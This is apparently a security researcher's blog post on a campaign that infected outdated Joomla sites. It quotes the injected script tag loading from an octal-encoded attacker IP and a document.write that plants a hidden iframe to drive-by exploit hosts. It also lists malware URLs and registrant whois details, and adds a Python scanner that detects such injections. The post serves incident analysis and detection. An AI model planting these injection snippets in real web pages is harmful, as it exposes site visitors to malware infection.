Malware week – 0133.0331.0242.0033, javadisplay and more

Very busy week in terms of malware. First Hilary Kneber decided to make a comeback, inlovebot.com and crazymasya.com reinfected a lot of sites, and now many outdated Joomla sites are being infected with malware from 0133.0331.0242.0033 (yes, that is the IP address 91.217.162.27 written in octal, a trick that keeps the host from looking like an IP address to a casual reader or to a naive string match on the usual dotted-decimal form).

This is the code added to the hacked sites:

<script src="http://0133.0331.0242.0033/0132.js" >..


The script served from that host is used to write a malicious iframe that loads from other attacker-controlled sites (javadisplay.com, mainborder.com, etc.):

document . write("<iframe src="http://mainborder.com/in.cgi?2" width =`1`…
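The two injected snippets above are what a responder has to find in a compromised site's files, and the octal host is exactly the kind of thing a grep for dotted-decimal IPs misses. The following scanner is an added example (not code from the original post or from Sucuri): it pulls the `src` of every `script` and `iframe` tag, decodes IPv4 literals written in any of the forms browsers accept (dotted octal, hex, decimal, or a single 32-bit integer, which goes beyond the octal case in the post), and flags hosts that are obfuscated IP literals or that match the indicators listed in this post. The sample HTML is constructed from the snippets quoted above plus one clean script tag so there is something to ignore.

```python
import re
import ipaddress

# Constructed sample: the two injected lines quoted in the post, plus one
# legitimate script tag so the scanner has something it must not flag.
SAMPLE_HTML = """<html><head><title>site</title>
<script src="http://0133.0331.0242.0033/0132.js" ></script>
<script src="https://code.jquery.com/jquery.min.js"></script>
</head><body>
<script>document . write("<iframe src='http://mainborder.com/in.cgi?2' width=1 height=1></iframe>")</script>
</body></html>"""

# Indicators taken from the post: the decoded script host and the iframe hosts.
KNOWN_BAD = {"91.217.162.27", "91.217.162.34", "mainborder.com", "javadisplay.com"}

# Matches <script ... src=...> and <iframe ... src=...>, tolerating a
# backslash-escaped quote (as inside a document.write string) and a
# protocol-relative "//host" form.  Group 2 is the host part only.
SRC_RE = re.compile(
    r"""<(script|iframe)\b[^>]*?\bsrc\s*=\s*\\?["']?(?:https?:)?//([^"'/\s>\\?]+)""",
    re.IGNORECASE,
)


def decode_ip_host(host):
    """Return the dotted-quad form of host if it is an IPv4 literal in any of
    the forms browsers accept: dotted octal (0133...), hex (0x5b...), decimal,
    or fewer than four parts with the last part filling the remaining bytes
    (including a single 32-bit integer).  Returns None for real hostnames
    and for anything that does not parse."""
    parts = host.split(".")
    if not 1 <= len(parts) <= 4:
        return None
    values = []
    for p in parts:
        try:
            if p.lower().startswith("0x"):
                values.append(int(p, 16))
            elif len(p) > 1 and p.startswith("0"):
                values.append(int(p, 8))  # leading zero means octal, as in browsers
            else:
                values.append(int(p, 10))
        except ValueError:
            return None  # non-numeric part: this is a hostname, not an IP literal
    *head, last = values
    if any(v > 255 for v in head):
        return None
    width = 4 - len(head)  # bytes the final part is allowed to cover
    if last >= 256 ** width:
        return None
    n = 0
    for v in head:
        n = (n << 8) | v
    n = (n << (8 * width)) | last
    return str(ipaddress.IPv4Address(n))


def scan_html(html):
    """Return one finding per external script/iframe src in html."""
    findings = []
    for m in SRC_RE.finditer(html):
        tag, host = m.group(1).lower(), m.group(2)
        ip = decode_ip_host(host)
        # An IP literal whose spelling differs from dotted decimal is obfuscated.
        obfuscated = ip is not None and ip != host
        findings.append({
            "tag": tag,
            "host": host,
            "ip": ip,
            "obfuscated": obfuscated,
            "suspicious": obfuscated or host in KNOWN_BAD or ip in KNOWN_BAD,
        })
    return findings


if __name__ == "__main__":
    for f in scan_html(SAMPLE_HTML):
        status = "SUSPICIOUS" if f["suspicious"] else "ok"
        print(f"{status:10} <{f['tag']}> host={f['host']} ip={f['ip']} obfuscated={f['obfuscated']}")
```

Run it over each PHP/HTML/JS file of the Joomla install (for example by walking the document root and calling `scan_html` on every file's contents); anything reported as obfuscated or matching the indicator list should be treated as an injection rather than as a legitimate include, and the decoded dotted-quad is what goes into firewall rules and log searches.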

The page loaded in that iframe then tries to infect the visitor's computer through multiple client-side vulnerabilities (in Java, PDF readers, Flash, etc.). These are some of the hosts being used to distribute the malware:

http://mainborder.com/in.cgi?2

http://javadisplay.com/in.cgi?2

http://91.217.162.34/in.cgi?2

This is the Whois info for those domains:

Registrant:
N/A
Vladimir Fedorov (feodorovv_vla29@gmail.com)
9 Ivana Babushkina st. app.34
Moscow
Moskovskaya oblast,117292
RU
Tel. +495.5947419

If you are using Joomla, make sure it is updated to the latest version and properly monitored. If your site is currently infected, you can sign up here to get it cleaned up / secured.

If you have any questions, let us know.

About David Dede

David Dede is a Security Researcher in the SucuriLabs group. He spends most of his time dissecting vulnerabilities and security issues. You won't find him on Twitter because he is paranoid about privacy.